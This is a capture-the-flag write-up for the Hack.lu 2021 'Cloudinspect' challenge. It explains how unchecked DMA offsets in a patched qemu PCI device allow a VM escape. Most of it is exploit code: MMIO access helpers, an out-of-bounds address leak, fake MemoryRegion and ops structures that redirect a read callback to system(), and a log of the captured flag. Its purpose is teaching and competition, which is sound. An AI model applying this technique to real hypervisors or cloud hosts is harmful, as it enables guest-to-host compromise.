NOTE: The following is a writeup for the solution we developed independently for this challenge after the end of the competition.
Cloudinspect was a pwn challenge during Hack.lu CTF 2021 that got 14 solves. We are given a patched qemu-system-x86_64 binary, the patch itself as a diff file, and a Linux kernel and filesystem to launch with the qemu binary (initramfs.cpio.gz and vmlinuz-5.11.0-38-generic). Additionally, we have some shell scripts to launch the VM and rebuild qemu.
The qemu patch adds a new emulated PCI device that is available inside the guest. You can read the added code here. This emulated device runs as part of qemu’s process, meaning that if we can exploit it, we can very likely escape the VM, which is the goal of this challenge.
Code analysis
The device gets declared through several functions we do not really care about. Then the device registers a memory region so the guest OS can interact with it via memory-mapped IO (MMIO):
static void pci_cloudinspect_realize(PCIDevice *pdev, Error **errp) {
    CloudInspectState *cloudinspect = CLOUDINSPECT(pdev);
    if (msi_init(pdev, 0, 1, true, false, errp)) {
        return;
    }
    cloudinspect->as = &address_space_memory;
    memory_region_init_io(&cloudinspect->mmio, OBJECT(cloudinspect), &cloudinspect_mmio_ops, cloudinspect,
                          "cloudinspect-mmio", 1 * MiB);
    pci_register_bar(pdev, 0, PCI_BASE_ADDRESS_SPACE_MEMORY, &cloudinspect->mmio);
}
From the qemu docs:
MMIO: a range of guest memory that is implemented by host callbacks; each read or write causes a callback to be called on the host. You initialize these with memory_region_init_io(), passing it a MemoryRegionOps structure describing the callbacks.
The device emulation objects will use memory_region_init_io() to install their MMIO handlers, and pci_register_bar() to associate those handlers with a PCI BAR, as they do within QEMU currently.
The function prototype for memory_region_init_io is:
void memory_region_init_io(
    MemoryRegion *mr,
    Object *owner,
    const MemoryRegionOps *ops,
    void *opaque,
    const char *name,
    uint64_t size
);
Note that the state structure itself (cloudinspect) is passed as the opaque parameter; this will be useful later. The CloudInspectState and cloudinspect_mmio_ops structures have the following layout:
#define DMA_SIZE 4096
struct CloudInspectState {
    PCIDevice pdev;
    MemoryRegion mmio;
    AddressSpace *as;
    struct dma_state {
        dma_addr_t src;
        dma_addr_t dst;
        dma_addr_t cnt;
        dma_addr_t cmd;
    } dma;
    char dma_buf[DMA_SIZE];
};
static const MemoryRegionOps cloudinspect_mmio_ops = {
    .read = cloudinspect_mmio_read,
    .write = cloudinspect_mmio_write,
    .endianness = DEVICE_NATIVE_ENDIAN,
    .valid = {
        .min_access_size = 4,
        .max_access_size = 8,
    },
    .impl = {
        .min_access_size = 4,
        .max_access_size = 8,
    },
};
Whenever we interact with the PCI device via MMIO, qemu calls the read callback (cloudinspect_mmio_read) or the write callback (cloudinspect_mmio_write) registered in cloudinspect_mmio_ops; the opaque value we saw earlier is passed as their first parameter. Let us take a look at these callbacks.
static uint64_t cloudinspect_mmio_read(void *opaque, hwaddr addr, unsigned size) {
    CloudInspectState *cloudinspect = opaque;
    uint64_t val = ~0ULL;
    switch (addr) {
    case 0x00:
        val = 0xc10dc10dc10dc10d;
        break;
    case CLOUDINSPECT_MMIO_OFFSET_CMD:
        val = cloudinspect->dma.cmd;
        break;
    case CLOUDINSPECT_MMIO_OFFSET_SRC:
        val = cloudinspect->dma.src;
        break;
    case CLOUDINSPECT_MMIO_OFFSET_DST:
        val = cloudinspect->dma.dst;
        break;
    case CLOUDINSPECT_MMIO_OFFSET_CNT:
        val = cloudinspect->dma.cnt;
        break;
    case CLOUDINSPECT_MMIO_OFFSET_TRIGGER:
        val = cloudinspect_DMA_op(cloudinspect, false);
        break;
    }
    return val;
}
static void cloudinspect_mmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size) {
    CloudInspectState *cloudinspect = opaque;
    switch (addr) {
    case CLOUDINSPECT_MMIO_OFFSET_CMD:
        cloudinspect->dma.cmd = val;
        break;
    case CLOUDINSPECT_MMIO_OFFSET_SRC:
        cloudinspect->dma.src = val;
        break;
    case CLOUDINSPECT_MMIO_OFFSET_DST:
        cloudinspect->dma.dst = val;
        break;
    case CLOUDINSPECT_MMIO_OFFSET_CNT:
        cloudinspect->dma.cnt = val;
        break;
    case CLOUDINSPECT_MMIO_OFFSET_TRIGGER:
        val = cloudinspect_DMA_op(cloudinspect, true);
        break;
    }
}
Both of them look really similar. If we read or write at certain offsets in the memory region corresponding to the vulnerable device, we will be reading or writing the fields of cloudinspect.dma, whose layout was described above. The only exception is the last case, which triggers a call to cloudinspect_DMA_op. cloudinspect_DMA_op simply checks that cloudinspect->dma.cmd has one of two specified values (it does not matter which), and that cloudinspect->dma.cnt is not greater than DMA_SIZE (4096). It then calls cloudinspect_dma_rw, propagating the second parameter (write):
static void cloudinspect_dma_rw(CloudInspectState *cloudinspect, bool write) {
    if (write) {
        uint64_t dst = cloudinspect->dma.dst;
        // DMA_DIRECTION_TO_DEVICE: Read from an address space to PCI device
        dma_memory_read(
            cloudinspect->as,
            cloudinspect->dma.src,
            cloudinspect->dma_buf + dst,
            cloudinspect->dma.cnt
        );
    } else {
        uint64_t src = cloudinspect->dma.src;
        // DMA_DIRECTION_FROM_DEVICE: Write to address space from PCI device
        dma_memory_write(
            cloudinspect->as,
            cloudinspect->dma.dst,
            cloudinspect->dma_buf + src,
            cloudinspect->dma.cnt
        );
    }
}
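So far, we know that we can interact with a memory region via MMIO and trigger calls to dma_memory_write and dma_memory_read. The second parameter to each of these functions is a physical address in the guest’s memory, the third one is an address in qemu’s regular virtual address space, and the fourth one is the number of bytes to be transferred between the two. Note the direction: an MMIO write to the trigger offset copies guest memory into dma_buf + dst, while an MMIO read of the trigger offset copies dma_buf + src out to guest memory.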
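To make the consequence of this design concrete, here is a small userland model of the device-to-guest path. It is only a sketch: struct model_state and model_dma_out are hypothetical names, the model keeps just one field on either side of the buffer, and it adds a guard of its own (which the real device lacks) so that the demonstration never leaves its own structure.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define DMA_SIZE 4096

/* Hypothetical stand-in for the device state: only what matters here. */
struct model_state {
    uint64_t before;                 /* stands in for fields placed before dma_buf */
    unsigned char dma_buf[DMA_SIZE];
    uint64_t after;                  /* stands in for whatever follows dma_buf */
};

/*
 * Mimics the device-to-guest copy: cnt is validated, src is not.
 * Returns 0 on success, -1 if the count check rejects the request and
 * -2 if the model-only guard stops the copy from leaving the structure.
 */
static int model_dma_out(const struct model_state *st, uint64_t src,
                         uint64_t cnt, void *out)
{
    uint64_t start;

    if (cnt > DMA_SIZE)
        return -1;                   /* the only check the device performs */

    /* Same arithmetic as dma_buf + src; it wraps modulo 2^64. */
    start = offsetof(struct model_state, dma_buf) + src;
    if (start > sizeof(*st) || cnt > sizeof(*st) - start)
        return -2;                   /* model-only guard */

    memcpy(out, (const unsigned char *)st + start, cnt);
    return 0;
}
```

With src set to DMA_SIZE the model returns the field that follows the buffer, and with src set to (uint64_t)-8 it returns the field that precedes it; only an oversized cnt is rejected.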
Interacting with the PCI device
In order to exploit the device, we first must find a way to interact with it. After launching the VM, we can use lspci -v to get a list of available devices:
/ # lspci -v
00:01.0 Class 0601: 8086:7000
00:00.0 Class 0600: 8086:1237
00:01.3 Class 0680: 8086:7113
00:01.1 Class 0101: 8086:7010
00:02.0 Class 00ff: 1337:1337
The device with ID 1337 looks interesting. In the source code for our device, we find the following defines:
#define CLOUDINSPECT_VENDORID 0x1337
#define CLOUDINSPECT_DEVICEID 0x1337
Now that we have identified the device, we can list its memory range with /proc/iomem:
/ # cat /proc/iomem
...
08000000-febfffff : PCI Bus 0000:00
feb00000-febfffff : 0000:00:02.0
...
The memory range for device 00:02.0 is feb00000-febfffff. If we map it and read at offset zero, we should see the magic number returned by the first switch case in cloudinspect_mmio_read:
#include <assert.h>
#include <err.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h>
#define DEV_ADDR 0xfeb00000
#define MAP_SIZE 0x100000 /* feb00000-febfffff inclusive: the 1 MiB BAR */
typedef uint64_t u64;
u64 read_magic(volatile void* mem) {
    /* Keep the volatile qualifier so the MMIO read is really performed. */
    return *(volatile u64*)mem;
}
void* map_device(int fd) {
    void* mem;
    mem = mmap(NULL, MAP_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fd, DEV_ADDR);
    if (mem == MAP_FAILED)
        err(EXIT_FAILURE, "mmap");
    return mem;
}
void unmap_device(volatile void* mem) {
    munmap((void*)mem, MAP_SIZE);
}
int main(void) {
    int fd;
    volatile void* mem;
    u64 magic;
    fd = open("/dev/mem", O_RDWR | O_SYNC);
    if (fd < 0)
        err(EXIT_FAILURE, "open");
    mem = map_device(fd);
    magic = read_magic(mem);
    assert(magic == 0xc10dc10dc10dc10d);
    unmap_device(mem);
    close(fd);
    return EXIT_SUCCESS;
}
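The listing above hard-codes the base address taken from /proc/iomem. As a possible alternative, the range could be parsed at run time. The helper below is a hypothetical sketch (iomem_match is not part of the original exploit) that handles a single line in the format shown earlier and also makes the size of the range explicit.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Hypothetical helper: parse one /proc/iomem line such as
 *   "  feb00000-febfffff : 0000:00:02.0"
 * and report the base and size of the range if its label equals `bdf`.
 * Returns 1 on a match and 0 otherwise.
 */
static int iomem_match(const char *line, const char *bdf,
                       uint64_t *base, uint64_t *size)
{
    unsigned long long start, end;
    char label[64];

    /* Leading spaces (nesting depth) are skipped by the format string. */
    if (sscanf(line, " %llx-%llx : %63s", &start, &end, label) != 3)
        return 0;
    if (strcmp(label, bdf) != 0 || end < start)
        return 0;

    *base = start;
    *size = end - start + 1;   /* the printed range is inclusive */
    return 1;
}
```

Feeding it the line for 0000:00:02.0 yields a base of 0xfeb00000 and a size of 0x100000, which matches the 1 MiB passed to memory_region_init_io.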
Now that we can interact with the device, it is time to exploit it.
Exploitation
The bug is clear: cloudinspect->dma.cnt is bounded to a maximum of 4096, but cloudinspect->dma.dst and cloudinspect->dma.src, which are used as offsets into dma_buf, are not bounded at all. This means we can read and write any location we want outside of cloudinspect->dma_buf when triggering dma_memory_read and dma_memory_write.
Our first goal is to obtain a memory leak in order to break ASLR. We took the simplest approach: we started printing blocks of 8 bytes, starting at cloudinspect->dma_buf + 4096:
u64 virt2phys(volatile void* p) {
    /* https://github.com/kitctf/writeups/blob/2af257868242fafef4a204349d22227b62d9b8bb/hitb-gsec-2017/babyqemu/pwn.c#L35 */
}
/* The register accessors keep the volatile qualifier so every MMIO access is emitted. */
void write_dst(volatile void* mem, u64 dst) {
    *(volatile u64*)((uintptr_t)mem + CLOUDINSPECT_MMIO_OFFSET_DST) = dst;
}
void write_src(volatile void* mem, u64 src) {
    *(volatile u64*)((uintptr_t)mem + CLOUDINSPECT_MMIO_OFFSET_SRC) = src;
}
void write_cmd(volatile void* mem, u64 cmd) {
    *(volatile u64*)((uintptr_t)mem + CLOUDINSPECT_MMIO_OFFSET_CMD) = cmd;
}
void write_cnt(volatile void* mem, u64 cnt) {
    *(volatile u64*)((uintptr_t)mem + CLOUDINSPECT_MMIO_OFFSET_CNT) = cnt;
}
u64 read_trigger(volatile void* mem) {
    u64 out;
    write_cmd(mem, CLOUDINSPECT_DMA_GET_VALUE);
    out = *(volatile u64*)((uintptr_t)mem + CLOUDINSPECT_MMIO_OFFSET_TRIGGER);
    if (!out)
        warnx("read_trigger");
    return out;
}
/* Copy `size` bytes from dma_buf + off into guest physical memory at local_phys. */
void read_from_dma_buf(volatile void* mem, u64 local_phys, u64 size, u64 off) {
    write_cnt(mem, size);
    write_dst(mem, local_phys);
    write_src(mem, off);
    read_trigger(mem);
}
int main(void) {
    int fd;
    volatile void* mem;
    volatile void* buf;
    u64 buf_phys;
    u64 i;
    fd = open("/dev/mem", O_RDWR | O_SYNC);
    if (fd < 0)
        err(EXIT_FAILURE, "open");
    mem = map_device(fd);
    /* The original listing never initialized buf; map_buf() and unmap_buf() are listed further below. */
    buf = map_buf();
    buf_phys = virt2phys(buf);
    for (i = 0; i < 100; ++i) {
        read_from_dma_buf(mem, buf_phys, sizeof(u64), DMA_SIZE + (i * 8));
        printf("%lu: 0x%lx\n", i, *(volatile u64*)buf);
    }
    unmap_buf(buf);
    unmap_device(mem);
    close(fd);
    return EXIT_SUCCESS;
}
We found the 7th value to be a reliable leak from which we can calculate the address of any function in the qemu binary as a fixed offset. However, this leak does not help with heap addresses: the heap’s base address is randomized on every execution, and it is not mapped at a constant offset from the executable regions of the process. We could not find a heap leak in this region that was reliable both locally and remotely, so we decided not to depend on one.
Our strategy at this point is to overwrite a function pointer with the address of libc’s system function; ideally we should also be able to control its first parameter.
CloudInspectState has a field called mmio, which has the type MemoryRegion. We can take a look at this structure’s layout within qemu’s source code:
struct MemoryRegion {
    const MemoryRegionOps *ops;
    void *opaque;
    /* snip */
};
Every time a read or write is performed on an MMIO region, one of the callbacks in ops is called with opaque as its first parameter. If we can swap the ops pointer to a structure we control, and then make opaque point to a string like /bin/sh, we can escape the VM! Our gameplan is the following:
- Read cloudstate.mmio->ops.
- Change ops->read to point to libc’s system.
- Write our fake ops into dma_buf.
- Write the string cat flag at a different offset in dma_buf.
- Read cloudstate.mmio.
- Patch mmio:
  - Make mmio->ops point to our structure in dma_buf.
  - Make mmio->opaque point to our string in dma_buf.
- Write mmio back to its location within cloudstate.
- Trigger a read in order for cloudstate.mmio->ops->read to be called.
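The core idea of the plan, swapping a callback table and its opaque argument, can be illustrated without qemu at all. The following is a simplified userland model with hypothetical names (model_region, model_ops, fake_system); the stand-in for system only records the string it receives instead of running a command.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Simplified stand-ins; the real qemu structures have many more fields. */
typedef uint64_t (*model_read_fn)(void *opaque, uint64_t addr, unsigned size);

struct model_ops    { model_read_fn read; };
struct model_region { const struct model_ops *ops; void *opaque; };

static char captured[32];   /* what the hijacked callback was handed */

/* The legitimate callback: returns the device's magic value. */
static uint64_t benign_read(void *opaque, uint64_t addr, unsigned size)
{
    (void)opaque; (void)addr; (void)size;
    return 0xc10dc10dc10dc10dULL;
}

/* Stand-in for system(): like system(), it only cares about argument one. */
static uint64_t fake_system(void *opaque, uint64_t addr, unsigned size)
{
    (void)addr; (void)size;
    strncpy(captured, (const char *)opaque, sizeof(captured) - 1);
    captured[sizeof(captured) - 1] = '\0';
    return 0;
}

/* What the emulator conceptually does on every MMIO read. */
static uint64_t model_dispatch_read(struct model_region *mr, uint64_t addr)
{
    return mr->ops->read(mr->opaque, addr, 8);
}

/* Replace both fields, as the plan does through the out-of-bounds write. */
static void model_hijack(struct model_region *mr,
                         const struct model_ops *fake_ops, char *cmd)
{
    mr->ops = fake_ops;
    mr->opaque = cmd;
}
```

Before the swap, a dispatched read returns the magic value; afterwards the same dispatch hands the attacker-chosen string to the replacement function. In the real exploit the replacement is system, which simply ignores the extra addr and size arguments.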
In order to do this, there are some addresses we need to know:
- The address of the ops structure that mmio->ops points to. We can obtain it from the leak we got earlier, as it does not live in the heap.
- The address of system. We can obtain this from our leak as well; the address we compute lies inside the qemu binary (presumably its PLT stub for libc’s system), which is why the code calls it qemu_system.
- The address of cloudstate. We need it to obtain the address of dma_buf as an offset from it, since we will make mmio->opaque and mmio->ops point into dma_buf. We also need it in order to read or write any absolute address, as the host address passed to dma_memory_read/dma_memory_write is calculated from cloudstate->dma_buf. Without it, we cannot read the ops structure even if we know its absolute address.
The key to leaking cloudstate’s address is the fact that cloudstate.mmio->opaque contains a pointer to it (as seen in pci_cloudinspect_realize). Therefore, we can overflow the 64-bit addition in cloudinspect_dma_rw (cloudinspect->dma_buf + src) in order to read at a negative offset from dma_buf:
/*
struct CloudInspectState {
    PCIDevice pdev;
    MemoryRegion mmio;          <--- mmio->opaque at offset 80
    AddressSpace *as;
    struct dma_state {
        dma_addr_t src;
        dma_addr_t dst;
        dma_addr_t cnt;
        dma_addr_t cmd;
    } dma;
    char dma_buf[DMA_SIZE];     <--- cloudinspect->dma_buf + src => overflow
};
*/
/*
 * (gdb) print sizeof(PCIDevice)
 * $1 = 2288
 * (gdb) print sizeof(MemoryRegion)
 * $5 = 240
 */
#define PCIDEVICE_STRUCT_SIZE 2288
#define MEMORYREGION_SIZE 240
static u64 qemu_system = 0;
static u64 ops_addr = 0;
static u64 cloudstate_addr = 0;
static u64 mmio_addr = 0;
static u64 dma_buf_addr = 0;
volatile void* map_buf() {
    volatile void* out;
    out = mmap(NULL, DMA_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
    if (out == MAP_FAILED)
        err(EXIT_FAILURE, "mmap");
    memset((void*)out, 0, DMA_SIZE);
    return out;
}
void unmap_buf(volatile void* buf) {
    munmap((void*)buf, DMA_SIZE);
}
void get_leaks(volatile void* mem) {
    volatile void* buf;
    u64 buf_phys;
    u64 leak; /* was used without a declaration in the original listing */
    buf = map_buf();
    buf_phys = virt2phys(buf);
    /* 7th quadword after dma_buf: a pointer into the qemu binary */
    read_from_dma_buf(mem, buf_phys, sizeof(u64), DMA_SIZE + (6 * 8));
    leak = *(volatile u64*)buf;
    qemu_system = leak - 0x37b7b0;
    ops_addr = leak + 0x663a10;
    /* We set `src` to a negative value, which becomes a big value when cast to unsigned. */
    /* 5 * 8 skips `as` and the four dma fields; the rest walks back from the end of mmio to mmio->opaque. */
    read_from_dma_buf(mem, buf_phys, sizeof(u64), (u64)(-((5 * 8) + (MEMORYREGION_SIZE - 80))));
    cloudstate_addr = *(volatile u64*)buf;
    mmio_addr = cloudstate_addr + PCIDEVICE_STRUCT_SIZE;
    dma_buf_addr = cloudstate_addr + PCIDEVICE_STRUCT_SIZE + MEMORYREGION_SIZE + (5 * 8);
    unmap_buf(buf);
}
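The offset arithmetic in get_leaks is easy to get wrong, so it may help to check it in isolation. The sketch below uses hypothetical helper names (dma_buf_offset, src_for_opaque, src_for_absolute) together with the sizes measured in gdb above, and assumes 64-bit unsigned wraparound, as in cloudinspect_dma_rw.

```c
#include <assert.h>
#include <stdint.h>

#define PCIDEVICE_STRUCT_SIZE 2288
#define MEMORYREGION_SIZE     240
#define OPAQUE_OFFSET         80        /* offset of opaque inside MemoryRegion */
#define PRE_BUF_FIELDS        (5 * 8)   /* `as` pointer plus the four dma fields */

/* Offset of dma_buf from the start of the state structure. */
static uint64_t dma_buf_offset(void)
{
    return PCIDEVICE_STRUCT_SIZE + MEMORYREGION_SIZE + PRE_BUF_FIELDS;
}

/* Value to program into src so that dma_buf + src lands on mmio's opaque. */
static uint64_t src_for_opaque(void)
{
    return (uint64_t)0 - (PRE_BUF_FIELDS + (MEMORYREGION_SIZE - OPAQUE_OFFSET));
}

/* Value to program into src or dst to reach an absolute host address. */
static uint64_t src_for_absolute(uint64_t target, uint64_t dma_buf_addr)
{
    /* Wraps modulo 2^64 when target lies below dma_buf. */
    return target - dma_buf_addr;
}
```

Plugging in the addresses from the sample run at the end of this writeup gives consistent results: cloudstate at 0x55f73c312380 plus dma_buf_offset() is 0x55f73c312d88, the leak 0x55f73a523510 minus 0x37b7b0 is 0x55f73a1a7d60, and the leak plus 0x663a10 is 0x55f73ab86f20.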
Of course, in order to replace the fields we want, we need structures that mirror the layout of the ones qemu uses:
/* Replacement for MemoryRegionOps. Size=80 */
struct FakeRegionOps {
    volatile void* read;
    volatile void* write;
    volatile unsigned char b[80 - 16];
};
/*
 * Replacement for MemoryRegion.
 * (gdb) print (int)&((struct MemoryRegion*)0)->ops
 * $3 = 72
 * (gdb) print (int)&((struct MemoryRegion*)0)->opaque
 * $4 = 80
 * (gdb) print sizeof(struct MemoryRegion)
 * $5 = 240
 */
struct FakeRegion {
    unsigned char p[72];
    const struct FakeRegionOps *ops;
    void *opaque;
    unsigned char b[240 - 16 - 72];
};
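Since the exploit depends on these replacement structures matching qemu's layout byte for byte, it can be worth checking them at compile time. The sketch below repeats the two structures, asserts the sizes and offsets quoted from gdb (assuming an x86_64 build), and shows one possible way to stage the payload. stage_payload, patch_region, and the choice of placing the command string right after the fake ops are assumptions for illustration, although that placement agrees with the sample run, where the new opaque equals dma_buf + 0x50.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define DMA_SIZE 4096

struct FakeRegionOps {
    volatile void *read;
    volatile void *write;
    volatile unsigned char b[80 - 16];
};

struct FakeRegion {
    unsigned char p[72];
    const struct FakeRegionOps *ops;
    void *opaque;
    unsigned char b[240 - 16 - 72];
};

/* Compile-time checks against the gdb measurements (x86_64 only). */
_Static_assert(sizeof(struct FakeRegionOps) == 80, "MemoryRegionOps size");
_Static_assert(offsetof(struct FakeRegion, ops) == 72, "ops offset");
_Static_assert(offsetof(struct FakeRegion, opaque) == 80, "opaque offset");
_Static_assert(sizeof(struct FakeRegion) == 240, "MemoryRegion size");

/* Assumed staging layout: fake ops at offset 0, command right after it. */
#define FAKE_OPS_OFF 0
#define CMD_OFF      sizeof(struct FakeRegionOps)

/* Fill `page` with the bytes meant for the start of dma_buf. */
static int stage_payload(unsigned char *page,
                         const struct FakeRegionOps *orig_ops,
                         uint64_t system_addr, const char *cmd)
{
    struct FakeRegionOps ops;
    size_t len = strlen(cmd) + 1;

    if (CMD_OFF + len > DMA_SIZE)
        return -1;
    memcpy(&ops, orig_ops, sizeof(ops));   /* keep every other field intact */
    ops.read = (volatile void *)(uintptr_t)system_addr;
    memset(page, 0, DMA_SIZE);
    memcpy(page + FAKE_OPS_OFF, &ops, sizeof(ops));
    memcpy(page + CMD_OFF, cmd, len);
    return 0;
}

/* Point a copy of mmio at the staged payload inside dma_buf. */
static void patch_region(struct FakeRegion *mmio, uint64_t dma_buf_addr)
{
    mmio->ops = (const struct FakeRegionOps *)(uintptr_t)(dma_buf_addr + FAKE_OPS_OFF);
    mmio->opaque = (void *)(uintptr_t)(dma_buf_addr + CMD_OFF);
}
```

Copying the original ops first and changing only read keeps the remaining callbacks and access-size fields valid, so unrelated MMIO accesses keep behaving normally until the final trigger.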
Combining all the pieces, we are able to execute our gameplan above. You can find our full exploit here.
$ { stat -c "%s" solve; sleep 1; cat solve; } | nc flu.xxx 20065
...
magic=c10dc10dc10dc10d
leak: 0x55f73a523510
cloudstate @ 0x55f73c312380
cloudstate->dma_buf @ 0x55f73c312d88
old ops->read: 0x55f73a221480
new ops->read: 0x55f73a1a7d60
> Writing fake_ops to dma_buf
> Writing shell to dma_buf
> Reading mmio
old mmio->ops: 0x55f73ab86f20
old mmio->opaque: 0x55f73c312380
new mmio->ops: 0x55f73c312d88
new mmio->opaque: 0x55f73c312dd8
> Writing fake mmio
> Triggering mmio read
flag{cloudinspect_inspects_your_cloud_0107}